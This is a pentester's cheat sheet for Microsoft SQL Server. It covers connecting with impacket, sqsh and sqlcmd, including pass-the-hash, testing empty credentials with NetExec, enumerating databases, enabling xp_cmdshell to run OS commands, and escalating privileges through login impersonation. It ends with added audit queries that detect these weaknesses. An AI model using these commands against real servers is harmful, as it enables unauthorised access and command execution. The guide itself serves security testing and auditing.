Microsoft SQL Server: 101

Hands-on Microsoft SQL Server exploitation guide for pentesters, including service detection, authentication, database enumeration, command execution, and privilege escalation.

What is MSSQL?

Default port: 1433

Microsoft SQL Server (MSSQL) is a proprietary relational database management system (RDBMS) developed by Microsoft, designed to store, retrieve, and manage structured data. It uses Transact-SQL (T-SQL), a proprietary SQL variant, to handle transactional processing, business intelligence, and analytics applications across corporate environments.

Connect

MSSQLCLIENT

# Windows authentication (domain account, NTLM; needs -windows-auth)
mssqlclient.py DOMAIN/username:password@target.com -windows-auth

# SQL authentication (SQL Server login such as sa; no -windows-auth)
mssqlclient.py sa:password@target.com

# With specific database
mssqlclient.py username:password@target.com -db master

# Using hash (Pass-the-Hash; NTLM, so Windows authentication is required)
mssqlclient.py username@target.com -hashes :NTHASH -windows-auth

SQSH

# Connect with SQL authentication
sqsh -S target.com -U sa -P password

# Connect with Windows authentication
sqsh -S target.com -U DOMAIN\\username -P password

SQLCMD (WINDOWS)

# Local connection
sqlcmd -S localhost -U sa -P password

# Remote connection (host,port)
sqlcmd -S target.com,1433 -U sa -P password

# Windows authentication (trusted connection, current user)
sqlcmd -S target.com -E

# Execute query directly
sqlcmd -S target.com -U sa -P password -Q "SELECT @@version"

Reconnaissance

Service Detection (NMAP)

Using nmap to detect running MSSQL services.

nmap -p 1433 target.com

Credential Verification

Check whether the instance accepts empty credentials, first as a local SQL login and then as a Windows (domain) account.

# With local auth (SQL Server login)
nxc mssql $IP -u '' -p '' --local-auth

# Without local auth (Windows/domain authentication)
nxc mssql $IP -u '' -p ''

Enumeration

Version Detection

-- Get SQL Server version
SELECT @@version;

-- Get product version, patch level and edition
SELECT SERVERPROPERTY('ProductVersion');
SELECT SERVERPROPERTY('ProductLevel');
SELECT SERVERPROPERTY('Edition');

-- Get machine name
SELECT @@SERVERNAME;
SELECT SERVERPROPERTY('MachineName');

Database Enumeration

-- List all databases
SELECT name FROM sys.databases;
SELECT name FROM master.dbo.sysdatabases;

-- Current database
SELECT DB_NAME();

-- Database information
SELECT name, database_id, create_date
FROM sys.databases;

-- Database size and file layout
EXEC sp_helpdb;

MSSQLCLIENT (COMMANDS)

XP_CMDSHELL

# Enable xp_cmdshell (requires sysadmin)
enable_xp_cmdshell

# Run an OS command through xp_cmdshell
xp_cmdshell whoami

Enumerate

enum_db;
enum_users;
enum_logins;
enum_links;
enum_impersonate;

# Interact
USE x_database;
SELECT name FROM sysobjects WHERE xtype='U';
SELECT * FROM tablename;

Impersonate

enum_impersonate;
exec_as_login username;

Privilege Escalation

NXC

Detect which user can be impersonated for privilege escalation with NXC. Use -M to view all modules.

nxc mssql $IP -u '' -p '' --local-auth -M mssql_priv
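The impersonation paths reported by enum_impersonate and mssql_priv, and the xp_cmdshell state, can also be audited from the server side. The following T-SQL is an added example, not part of the original post or of the impacket/NetExec projects; it assumes a login allowed to read the server catalog views (sysadmin, or VIEW ANY DEFINITION plus VIEW SERVER STATE).

```sql
-- Added audit queries (example, not from the original post).
-- Assumes a login that can read sys.configurations and the server catalog views.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means OS command execution is on.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Which logins may impersonate which other logins, and is the target sysadmin?
--    class 101 = SERVER_PRINCIPAL, so major_id is the impersonated login's principal_id.
SELECT
    grantee.name                              AS grantee_login,
    target.name                               AS impersonated_login,
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class = 101
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W')   -- GRANT, or GRANT WITH GRANT OPTION
ORDER BY target_is_sysadmin DESC, grantee_login;

-- 3. Same question for database users (run inside each database of interest).
--    class 4 = DATABASE_PRINCIPAL, so major_id is the impersonated user's principal_id.
SELECT
    grantee.name AS grantee_user,
    target.name  AS impersonated_user
FROM sys.database_permissions AS p
JOIN sys.database_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.database_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class = 4
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');
```

Any row in query 2 with target_is_sysadmin = 1 is a direct path from the grantee login to full instance control, and query 1 returning value_in_use = 1 for xp_cmdshell means that path also yields OS command execution.
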
This post is licensed under CC BY 4.0 by the author.